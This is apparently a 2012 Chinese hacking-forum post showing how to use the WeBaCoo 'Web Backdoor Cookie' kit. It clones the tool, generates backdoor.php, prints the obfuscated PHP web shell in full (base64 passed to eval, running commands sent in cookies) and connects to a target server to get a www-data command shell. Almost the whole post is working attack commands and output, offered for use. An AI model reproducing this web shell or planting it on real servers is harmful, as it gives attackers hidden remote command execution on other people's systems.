切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
235 PHP后门 SHELL WeBaCoo[复制链接]
发表于 2012-8-26 20:34:16 | 显示全部楼层 |!read_mode!
也是利用COOKIES传输
获得代码:
  1. root@Dis9Team:/pen/door# git clone git://github.com/anestisb/WeBaCoo.git
复制代码
安装模块
  1. root@Dis9Team:/pen/door/WeBaCoo# apt-get install liburi-perl libio-socket-socks-perl
复制代码
测试一下:
  1. root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl

  2.         WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
  3.         Copyright (C) 2011-2012 Anestis Bechtsoudis
  4.         { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

  5. root@Dis9Team:/pen/door/WeBaCoo#
复制代码

生成一个后门

上传

  1. root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl -g -o backdoor.php

  2.         WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
  3.         Copyright (C) 2011-2012 Anestis Bechtsoudis
  4.         { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

  5. [+] Backdoor file "backdoor.php" created.
  6. root@Dis9Team:/pen/door/WeBaCoo# cat backdoor.php
  7. <?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
  8. root@Dis9Team:/pen/door/WeBaCoo#
复制代码
连接

  1. root@Dis9Team:/pen/door/WeBaCoo# ./webacoo.pl -t -u http://5.5.5.2/door3.php

  2.         WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
  3.         Copyright (C) 2011-2012 Anestis Bechtsoudis
  4.         { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

  5. [+] Connecting to remote server as...
  6. uid=33(www-data) gid=33(www-data) groups=33(www-data)

  7. [*] Type 'load' to use an extension module.
  8. [*] Type ':<cmd>' to run local OS commands.
  9. [*] Type 'exit' to quit terminal.

  10. webacoo$ pwd
  11. /var/www
  12. webacoo$ id
  13. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  14. webacoo$
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-31 23:35

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部